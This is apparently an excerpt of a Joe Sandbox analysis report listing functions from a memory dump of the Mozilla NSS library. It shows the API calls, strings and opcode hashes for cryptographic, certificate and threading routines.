sql:, xrefs: 6C605CD1, 6C605D36
dbm:, xrefs: 6C605D03, 6C605D60
NSS_DEFAULT_DB_TYPE, xrefs: 6C605D1A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 91168699cae63555dd79ef7ea98d1cff2385ea05458685021bc3054d48b5b275
Instruction ID: 551302a9afaa8da1c6f07d031e913bfc422e22ac0ee674ee0964feb87047b8a0
Opcode Fuzzy Hash: 91168699cae63555dd79ef7ea98d1cff2385ea05458685021bc3054d48b5b275
Instruction Fuzzy Hash: ED3149B07023126BFB101A259D8CB6737E9AF02348F100433ED66F6AC2E771D401C65D

Function 6C606CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C6D1DE0,?), ref: 6C606CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C606D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C606D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C606D82
DER_GetInteger_Util.NSS3(?), ref: 6C606DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C606DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C606E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C606F19
PK11_DigestBegin.NSS3(00000000), ref: 6C606F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C606F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C607011
PK11_FreeSymKey.NSS3(00000000), ref: 6C607033
free.MOZGLUE(?), ref: 6C60703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C607060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C607087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6070AF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 6c654f38ed67276272cdd8d97fbfb9e6096dadef18dcbf0fd8eed30777d8da82
Instruction ID: d6f2a597c9d553ffaf5b5c94199a821197d55d0d84c3c42dcc3965e5119595ee
Opcode Fuzzy Hash: 6c654f38ed67276272cdd8d97fbfb9e6096dadef18dcbf0fd8eed30777d8da82
Instruction Fuzzy Hash: 0EA1F8B17083009BFB089B24DE45B9A3396DB8131CF248939ED19EBB81E775D885C75B

Function 6C5CAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CAF39
PR_Unlock.NSS3(?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CAF69
TlsGetValue.KERNEL32 ref: 6C5CB06B
EnterCriticalSection.KERNEL32(?), ref: 6C5CB083
PR_Unlock.NSS3(?), ref: 6C5CB0A4
TlsGetValue.KERNEL32 ref: 6C5CB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C5CB0D9
PR_Unlock.NSS3 ref: 6C5CB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CB182

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C5CB177

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CB1C2

Part of subcall function 6C5F1560: TlsGetValue.KERNEL32(00000000,?,6C5C0844,?), ref: 6C5F157A
Part of subcall function 6C5F1560: EnterCriticalSection.KERNEL32(?,?,?,6C5C0844,?), ref: 6C5F158F
Part of subcall function 6C5F1560: PR_Unlock.NSS3(?,?,?,?,6C5C0844,?), ref: 6C5F15B2

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: c468493cbf4c7481f4a66a6fac6a5be4bdeb12cba8711cef8eefcd1bc5e0f9c3
Instruction ID: 0d90a1acc3329813af3a925ce6c1ad8d1714fac563e45561a5cbd541c78662b6
Opcode Fuzzy Hash: c468493cbf4c7481f4a66a6fac6a5be4bdeb12cba8711cef8eefcd1bc5e0f9c3
Instruction Fuzzy Hash: 9FA1B5B5E00205EBEF00AFA4DC81AEE7BB4EF45308F144129E915A7751EB31D959CBA2

Function 6C5C2C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?\l,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2C62
EnterCriticalSection.KERNEL32(0000001C,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2C76
PL_HashTableLookup.NSS3(00000000,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2C93

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23), ref: 6C5C2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?), ref: 6C5C2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?), ref: 6C5C2D4D
EnterCriticalSection.KERNEL32(?), ref: 6C5C2D61
PL_HashTableLookup.NSS3(?,?), ref: 6C5C2D71
PR_Unlock.NSS3(?), ref: 6C5C2D7E

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

Strings

#?\l, xrefs: 6C5C2C43

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?\l
API String ID: 2446853827-4009640522
Opcode ID: 11a5b4ba79450219e496b1d8aa4501025bebe2de944f193da9df25a5b27bdbc2
Instruction ID: 144b6a912c2f75ce28858ff3ab4621aa329ecc4c51232cff68209fd9ee8e6cdb
Opcode Fuzzy Hash: 11a5b4ba79450219e496b1d8aa4501025bebe2de944f193da9df25a5b27bdbc2
Instruction Fuzzy Hash: AA51D6B5E00105EBDB009F64DC858AA7778FF66358F048564EC1997B11EB31ED68C7E2

Function 6C61AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C61ADB1

Part of subcall function 6C5FBE30: SECOID_FindOID_Util.NSS3(6C5B311B,00000000,?,6C5B311B,?), ref: 6C5FBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C61ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C61AE08

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C61AE25
PL_FreeArenaPool.NSS3 ref: 6C61AE63
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C61AE4D

Part of subcall function 6C524C70: TlsGetValue.KERNEL32(?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524C97
Part of subcall function 6C524C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CB0
Part of subcall function 6C524C70: PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C61AE93
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C61AECC
PL_FreeArenaPool.NSS3 ref: 6C61AEDE
PL_FinishArenaPool.NSS3 ref: 6C61AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C61AEF5
PL_FinishArenaPool.NSS3 ref: 6C61AF16

Strings

security, xrefs: 6C61ADEE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: dc6af46004636ac5eee6c15a19173df930e6f541074e9195ae559108deed5b60
Instruction ID: 07ac5ccfc53e85a20ce14596c0ab3de625349464152f27f764d6d6d0e58b5297
Opcode Fuzzy Hash: dc6af46004636ac5eee6c15a19173df930e6f541074e9195ae559108deed5b60
Instruction Fuzzy Hash: 0B412CF2948200ABE7115B2C9C45BAB32A4AF4231DF144625E914A2F43FB35D94D8BDF

Function 6C6BAF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C669890: TlsGetValue.KERNEL32(?,?,?,6C6697EB), ref: 6C66989E

EnterCriticalSection.KERNEL32(?), ref: 6C6BAF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C6BAFCE
PR_SetPollableEvent.NSS3(?), ref: 6C6BAFD9
EnterCriticalSection.KERNEL32(?), ref: 6C6BAFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C6BB00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C6BB02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C6BB070
PR_JoinThread.NSS3(?), ref: 6C6BB07B
free.MOZGLUE(?), ref: 6C6BB084
EnterCriticalSection.KERNEL32(?), ref: 6C6BB09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C6BB0C4
PR_JoinThread.NSS3(?), ref: 6C6BB0F3
free.MOZGLUE(?), ref: 6C6BB0FC
PR_JoinThread.NSS3(?), ref: 6C6BB137
free.MOZGLUE(?), ref: 6C6BB140

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 6c031347d21b277e5145bf0f717a2c69806d780ffcdec3d25bd4b0ca5c2f4cb3
Instruction ID: 3f843bfd23c7ef0be951fb7aa2754920650506b15202bc21fabd05036cd939af
Opcode Fuzzy Hash: 6c031347d21b277e5145bf0f717a2c69806d780ffcdec3d25bd4b0ca5c2f4cb3
Instruction Fuzzy Hash: 6A915CB5900601DFCB10DF15D8C085ABBF1FF8A31872985A9D8196BB22E732FC55CB99

Function 6C635CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C632BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C632A28,00000060,00000001), ref: 6C632BF0
Part of subcall function 6C632BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C632A28,00000060,00000001), ref: 6C632C07
Part of subcall function 6C632BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C632A28,00000060,00000001), ref: 6C632C1E
Part of subcall function 6C632BE0: free.MOZGLUE(?,00000000,00000000,?,6C632A28,00000060,00000001), ref: 6C632C4A

free.MOZGLUE(?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D0F
free.MOZGLUE(?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D4E
free.MOZGLUE(?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D62
free.MOZGLUE(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D85
free.MOZGLUE(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D99
free.MOZGLUE(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C635E3E
free.MOZGLUE(?,?,?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C635E47
free.MOZGLUE(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C635E78
free.MOZGLUE(?,?,?,?,?,?,?,6C63AAD4), ref: 6C635EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C63AAD4), ref: 6C635EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C635F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C635F4B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: d5e98d1efc5911154a543f1a9d683cc74b677cfc6561df84879fee1a0de06125
Instruction ID: 9a8d5b0f55631c0dfc7bc68e48a7f646b7ed9cd4d73917bc1c97119e0f21b690
Opcode Fuzzy Hash: d5e98d1efc5911154a543f1a9d683cc74b677cfc6561df84879fee1a0de06125
Instruction Fuzzy Hash: 8D719FB4A00B019FD711CF24D884A92B7F5FF89308F149529E86E87B11E732F965CB99

Function 6C5B8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C5B8E22
EnterCriticalSection.KERNEL32(?), ref: 6C5B8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C5B8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C5B8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5B8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C5B8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C5B8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8F00
free.MOZGLUE(?), ref: 6C5B8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C5B8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8F5B
PR_Unlock.NSS3(?), ref: 6C5B8F72
PR_Unlock.NSS3(?), ref: 6C5B8F82

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: dc32a010118c68a66de036dc4ccc4d664e8cf948f0338c23ebbdcdbe7f8f103f
Instruction ID: 81d1e6f3e76b73875280a0c44f209c9efa00b5bc78b7552ba72815ac9f1f2027
Opcode Fuzzy Hash: dc32a010118c68a66de036dc4ccc4d664e8cf948f0338c23ebbdcdbe7f8f103f
Instruction Fuzzy Hash: 8E510872E00212AFD710DF68CC949AABBB9EF45354F144529EC08AB700E731ED4487D6

Function 6C5DCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C5DCE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C5DCEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C5DCED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C5DCEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C5DCF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C5DCF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C5DCF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C5DCF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C5DCF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C5DCFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C5DCFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C5DCFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C5DCFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C5DD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C5DD021

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 134805570f4ba24595980edd0e0e11ea3f705490e053bdacbc4a5d7f50b73604
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: C03147B1752A5027EF0D905A5D21BEE144A4BE530EF450038FE0AE77C1F685AE1706FA

Function 6C6B0FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C6B1000

Part of subcall function 6C669BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C591A48), ref: 6C669BB3
Part of subcall function 6C669BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C591A48), ref: 6C669BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C6B1016

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_Unlock.NSS3(?), ref: 6C6B1021

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6B1046
PR_Unlock.NSS3(?), ref: 6C6B106B
PR_Lock.NSS3 ref: 6C6B1079
PR_Unlock.NSS3 ref: 6C6B1096
free.MOZGLUE(?), ref: 6C6B10A7
free.MOZGLUE(?), ref: 6C6B10B4
PR_DestroyCondVar.NSS3(?), ref: 6C6B10BF
PR_DestroyCondVar.NSS3(?), ref: 6C6B10CA
PR_DestroyCondVar.NSS3(?), ref: 6C6B10D5
PR_DestroyCondVar.NSS3(?), ref: 6C6B10E0
PR_DestroyLock.NSS3(?), ref: 6C6B10EB
free.MOZGLUE(?), ref: 6C6B1105

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 4f255b4bee377b4903fd6e4cf0c52f5f694028a853f81b578515065c6cc80cc3
Instruction ID: 1d78c919acc5acb1eaa85584e5cc00b4c25a6fd06f27f007481ac399e00e8759
Opcode Fuzzy Hash: 4f255b4bee377b4903fd6e4cf0c52f5f694028a853f81b578515065c6cc80cc3
